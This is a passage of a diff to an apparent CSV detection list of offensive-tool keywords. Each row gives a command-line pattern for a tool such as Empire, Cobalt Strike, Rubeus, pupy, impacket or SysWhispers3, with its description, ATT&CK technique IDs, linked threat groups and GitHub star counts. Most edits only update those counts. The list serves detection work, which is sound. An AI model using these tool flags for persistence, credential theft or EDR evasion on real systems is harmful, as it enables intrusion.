T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Persistence.psm1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* Persist General *.dll*","offensive_tool_keyword","COM-Hunter","COM-hunter is a COM Hijacking persistnce tool written in C#","T1122 - T1055.012","TA0003 - 
TA0005","N/A","N/A","Persistence","https://github.com/nickvourd/COM-Hunter","1","0","N/A","10","3","215","39","2023-09-06T09:48:55Z","2022-05-26T19:34:59Z" "* Persist Tasksch *.dll*","offensive_tool_keyword","COM-Hunter","COM-hunter is a COM Hijacking persistnce tool written in C#","T1122 - T1055.012","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/nickvourd/COM-Hunter","1","0","N/A","10","3","215","39","2023-09-06T09:48:55Z","2022-05-26T19:34:59Z" "* Persist TreatAs *.dll*","offensive_tool_keyword","COM-Hunter","COM-hunter is a COM Hijacking persistnce tool written in C#","T1122 - T1055.012","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/nickvourd/COM-Hunter","1","0","N/A","10","3","215","39","2023-09-06T09:48:55Z","2022-05-26T19:34:59Z" -"* persist_hkcu_run*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"* persist_hkcu_run*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" "* Persistence.sh*","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","0","N/A","10","4","348","73","2023-09-30T13:40:08Z","2022-03-23T15:52:41Z" -"* -PersistenceScriptName *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Persistence.psm1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"* -PersistentScriptFilePath *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Persistence.psm1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* -PersistenceScriptName *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Persistence.psm1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* -PersistentScriptFilePath *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Persistence.psm1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* PEzor.sh *","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - 
T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","0","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" -"* -pfx *.pfx -dc-ip *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* -pfx *.pfx -dc-ip *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" "* pgsql-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* -pi \\\\\\\\.\\\\pipe\\\\*","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10","","N/A","","","" -"* Pictures\Screenshots\loot.zip*","offensive_tool_keyword","Harvester_OF_SORROW","The payload opens firefox about:logins and tabs and arrows its way through options. It then takes a screen shot with the first set of log in credentials made visible. Finally it sends the screenshot to an email of your choosing.","T1056.001 - T1113 - T1512 - T1566.001 - T1059.006","TA0004 - TA0009 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/blob/master/payloads/library/credentials/Harvester_OF_SORROW/payload.txt","1","0","N/A","10","6","542","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" -"* --pinject *","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","1356","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"* Pictures\Screenshots\loot.zip*","offensive_tool_keyword","Harvester_OF_SORROW","The payload opens firefox about:logins and tabs and arrows its way through options. It then takes a screen shot with the first set of log in credentials made visible. 
Finally it sends the screenshot to an email of your choosing.","T1056.001 - T1113 - T1512 - T1566.001 - T1059.006","TA0004 - TA0009 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/blob/master/payloads/library/credentials/Harvester_OF_SORROW/payload.txt","1","0","N/A","10","6","544","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" +"* --pinject *","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" "* -PipeName * -ServiceName * -Command whoami*","offensive_tool_keyword","Invoke-SMBRemoting","Interactive Shell and Command Execution over Named-Pipes (SMB)","T1059 - T1021.002 - T1572","TA0002 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Invoke-SMBRemoting","1","0","N/A","9","1","22","4","2023-10-02T10:21:34Z","2023-09-06T16:00:47Z" "* pipename_stager *","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. 
These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","0","N/A","10","10","1362","429","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z" "* -pipename_stager *","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 
- T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","0","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" 
@@ -1523,38 +1523,38 @@ "* popcalc64.bin *","offensive_tool_keyword","Macrome","An Excel Macro Document Reader/Writer for Red Teamers & Analysts. Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/","T1140","TA0005","N/A","N/A","Exploitation tools","https://github.com/michaelweber/Macrome","1","0","N/A","N/A","6","522","83","2022-02-01T16:26:13Z","2020-05-07T22:44:11Z" "* --port 1337*","offensive_tool_keyword","empire","The Empire Multiuser GUI is a graphical interface to the Empire post-exploitation Framework","T1059.003 - T1071.001 - T1543.003 - T1041 - T1562.001","TA0002 - TA0010 - TA0011 ","N/A","N/A","C2","https://github.com/EmpireProject/Empire-GUI","1","0","N/A","10","10","471","145","2022-03-10T11:34:46Z","2018-04-20T21:59:52Z" "* port-states.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"* PoshC2 *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - 
HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"* -PoshC2Dir *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"* -PoshC2Dir *","offensive_tool_keyword","poshc2","PoshC2 is a proxy aware C2 framework used to aid penetration testers with red teaming. post-exploitation and lateral movement. PoshC2 is primarily written in Python3 and follows a modular format to enable users to add their own modules and tools. allowing an extendible and flexible C2 framework. Out-of-the-box PoshC2 comes PowerShell/C# and Python implants with payloads written in PowerShell v2 and v4. C++ and C# source code. a variety of executables. DLLs and raw shellcode in addition to a Python2 payload. These enable C2 functionality on a wide range of devices and operating systems. including Windows. 
*nix and OSX.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"* PoshC2 *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"* -PoshC2Dir *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"* -PoshC2Dir 
*","offensive_tool_keyword","poshc2","PoshC2 is a proxy aware C2 framework used to aid penetration testers with red teaming. post-exploitation and lateral movement. PoshC2 is primarily written in Python3 and follows a modular format to enable users to add their own modules and tools. allowing an extendible and flexible C2 framework. Out-of-the-box PoshC2 comes PowerShell/C# and Python implants with payloads written in PowerShell v2 and v4. C++ and C# source code. a variety of executables. DLLs and raw shellcode in addition to a Python2 payload. These enable C2 functionality on a wide range of devices and operating systems. including Windows. *nix and OSX.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" "* pptp-version.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"* preauthscan /users:*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* preauthscan /users:*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" "* prepare.sh shell/mod_*.htaccess*","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","0","N/A","10","10","945","196","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z" "* --preset all -o syscalls_all*","offensive_tool_keyword","SysWhispers3","SysWhispers on Steroids - AV/EDR evasion via direct system calls.","T1548 T1562 T1027 ","N/A","N/A","N/A","Defense Evasion","https://github.com/klezVirus/SysWhispers3","1","0","N/A","N/A","10","1006","148","2023-03-22T19:23:21Z","2022-03-07T18:56:21Z" "* --preset common -o syscalls_common*","offensive_tool_keyword","SysWhispers3","SysWhispers on Steroids - AV/EDR evasion via direct system calls.","T1548 T1562 T1027 ","N/A","N/A","N/A","Defense 
Evasion","https://github.com/klezVirus/SysWhispers3","1","0","N/A","N/A","10","1006","148","2023-03-22T19:23:21Z","2022-03-07T18:56:21Z" -"* PrincipalsAllowedToDelegateToAccount *","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket/blob/master/examples/getST.py","1","0","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"* PrincipalsAllowedToDelegateToAccount *","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket/blob/master/examples/getST.py","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" "* Priv_Esc.sh*","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","0","N/A","10","4","348","73","2023-09-30T13:40:08Z","2022-03-23T15:52:41Z" -"* --priv-esc*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","28282","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" +"* 